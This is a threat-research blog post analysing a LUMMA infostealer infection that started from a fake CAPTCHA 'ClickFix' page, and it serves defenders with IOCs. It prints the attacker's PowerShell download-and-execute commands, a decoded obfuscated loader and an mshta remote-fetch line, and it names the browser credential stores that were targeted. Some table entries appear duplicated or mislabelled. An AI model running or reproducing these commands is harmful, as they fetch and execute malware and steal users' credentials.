Skip to navigation Skip to main content Skip to footer
Research

Fake CAPTCHA led to LUMMA

by Molly Dewis

25 November 2025

Tldr;

This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team in May 2025 involving the infostealer LUMMA.
Below provides a summary of findings which are presented in this blog post:

  • Initial access via a drive by compromise
  • Leveraging PowerShell to execute commands and download files
  • Targeting Microsoft Edge and Google Chrome data

Overview

Lumma C2 Stealer is a variant of information stealer malware, first sighted in December 2022. It’s usually sold by a Russian-speaking Threat Actor, as a Malware as a Service offering.

A characteristic of infostealers is theft of sensitive data such as credentials, browser data and cryptocurrency. In this case, LUMMA was seen targeting browser data, specifically the data stores Login Data and Web Data for Microsoft Edge and Google Chrome.

Since its birth, LUMMA has utilised various tactics and techniques. In this incident, one host was impacted after the user was directed to a fake CAPTCHA verification page – one of the newer techniques observed in LUMMA campaigns.

Timeline

T + 0 minutes – Visited the fake CAPTCHA site

T + 1 minute – PowerShell execution and malicious file creation

T + 2 minutes – C2 connection and credential access activity

T + 7 minutes – Discovery activity

MITRE Techniques

Initial Access

T1189 – Drive-by Compromise The affected user visited the legitimate hxxps://astapowerproject[.]net/ however this visit led to 12 attempts to visit malicious sites – these were blocked. The hxxp://astapowerproject[.]net/ site was visited. Every time the page was refreshed, the related searches would change. Example searches can be seen in the screenshot below.

Each URL was wrapped in a googleadservices[.]com link.

Subsequent visits were then made to the below malicious CAPTCHA sites in the following order:

  • 871549.eliteeyeview[.]co (…Loading.. and reCAPTCHA V3 Security pages)
  • myvantage.getitquickly[.]biz (reCAPTCHA V3 Security page)
  • 657.s3.fr-par.scw[.]cloud (reCAPTCHA V3 Security page)

At the time of the investigation, the myvantage.getitquickly[.]biz URL when visited would redirect to the third URL which was inaccessible, as seen below.

The 657.s3.fr-par.scw[.]cloud domain suggests the resource was hosted on Scaleway, a European cloud provider, rather than AWS. The use of s3 indicates that object storage is used. fr-par refers to the region in this case France, Paris. scw.cloud is the domain for Scaleway.

Execution

T1204 – User Execution The fake CAPTCHA is where the webpage employs the ClickFix social engineering technique to download the malicious payload. This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard. At the time of detection, the URL was uploaded to the Any.Run sandbox and as seen below, the user would have been presented with a fake CAPTCHA page.

The below verification steps would appear to the user:

  1. Press Windows Button and R
  2. Press CTRL + V
  3. Press Enter

The Microsoft.Windows .Shell.RunDialog was opened and used to execute the PowerShell command: powershell -w hidden -nop -c $a='https://2n';$b='o.co/2OArm3';iex(irm ($a+$b)).

T1059.001 – Command and Scripting Interpreter: PowerShell

In addition to the PowerShell command executed in a hidden window, another PowerShell which was heavily obfuscated was executed.

The decoded command was:

iexhxxps://pub-24086c859ed94d628b911deba63401ab.r2[.]dev/
afc.zip$zip="$env:TEMP\afc.zip";  
$dest=Join-Path $env:TEMP ("afc_" + [guid]::NewGuid()); Expand-
Archive -Path $zip -DestinationPath $dest; Start-Process -FilePath
 (Join-Path $dest "AF1.exe"); 
$curl_command = $env:Temp;function wFPvdCjBn($iFuLaZNIo, $AFAeOI)
{curl $iFuLaZNIo -o $AFAeOI};function OlxYsax($GIHRSiO){wFPvdCjBn 
$GIHRSiO $AFAeOI}$AFAeOI = $env:Temp + '\afc.zip';OlxYsax 
$CPSr.SubString(3,59); 
Expand-Archive -Path $AFAeOI -DestinationPath $curl_command;Add-Type 
-Assembly System.IO.Compression.FileSystem;$JYcciN = 
[IO.Compression.ZipFile]::OpenRead($AFAeOI);$RNofm =($JYcciN.Entries 
| Sort-Object Name | Select-Object -First 1).Name;$mBSw = Join-Path 
$env:Temp $RNofm;start $mBSw ;;

A breakdown of this command is:

  • iex: Invoke-Expression executes a string as code. It downloaded the afc.zip from the iexhxxps://pub-24086c859ed94d628b911deba63401ab.r2[.]dev URL.
  • $zip="$env:TEMP\<zip file name> sets a variable $zip to a path in the temporary folder. In this case, the malicious zip was created in C:\Users\<USER>\AppData\Local\Temp\afc.zip.

The afc.zip file contained the below files:

Command Description
findstr pfirewall.log html for adding code snips
netsh advfirewall show currentprofile Display the current active firewall profile settings for the Windows Defender Firewall.

The above files except AF1.exe were also created in C:\ProgramData\unr.

T1059.010 – Command and Scripting Interpreter: AutoHotKey & AutoIT

The C:\Users\<USER>\AppData\Roaming\deci.com file was created at the same time as the afc.zip. This application was found to be AutoIt v3 Script (Beta) which is a scripting language used for creating automation scripts.

Defence Evasion

T1027 – Obfuscated Files or Information The PowerShell command to retrieve afc.zip was heavily obfuscated.

T1218.005 – System Binary Proxy Execution: Mshta Once the Run dialog was opened, a mshta.exe process was created, running the "mshta.exe" hxxps://2no[.]co/2Od3Q3 =-+2346823 command.

This command uses mshta.exe to fetch and execute a HTA file from a remote URL. A successful connection was made to the 2no[.]co domain.

Credential Access

T1555.003 – Credentials from Password Stores: Credentials from Web Browsers The AutoIt executable deci.com accessed the data stores Login Data and Web Data for both Microsoft Edge and Google Chrome browsers. Their file locations are:

  • C:\Users\<USER>\AppData\Local\Microsoft\Edge\User Data\Default
  • C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default

Discovery

T1518.001 – Software Discovery: Security Software Discovery The following commands were run at the time the host was compromised.

Command Description
findstr pfirewall.log findstr is a command-line utility used to search for specific strings of text within files. In this case, the string pfirewall.log is searched for.
netsh advfirewall show currentprofile Display the current active firewall profile settings for the Windows Defender Firewall.

Command and Control

T1071.001 – Application Layer Protocol: Web Protocols The malicious executable AF1.exe initiated an outbound connection to the C2 blameaowi[.]run over HTTPS.

IOCs

IOC Description
astapowerproject[.]net Initial site accessed by the user
871549.eliteeyeview[.]co Malicious redirect site
657.s3.fr-par.scw[.]cloud Fake CAPTCHA page
2no.co Outbound Connection to this domain
blameaowi[.]run Initial site accessed by the user
https://blameaowi.run/twiu C2
https://flowerexju.bet/lanz C2
https://mzmedtipp.live/mnvzx C2
https://easterxeen.run/zavc C2
https://araucahkbm/live/baneb C2
https://overcovtcg.top/juhd C2
https://blackswmxctop/bgry C2
https://posseswsnc.top/akds C2
https://4featurlyin.top/akds C2
7bca3ceb680ad8cb1f3cd0d24d106a28c813ce3b SHA1 Hash of AF1.exe
cf290cd98b3779e1e6b58441505d4dd411cdb541 SHA1 Hash of IconX.dll
3748ccd9f716e4668af8672e037b5729074e36c1 SHA1 Hash of dx0.dll
5e5f646f6b1f67519cabff1451aa3427eb46989f SHA1 Hash of DirectGUI.dll
5ceb5281b941699aacc2ea347494863cff583adf SHA1 Hash of afc.zip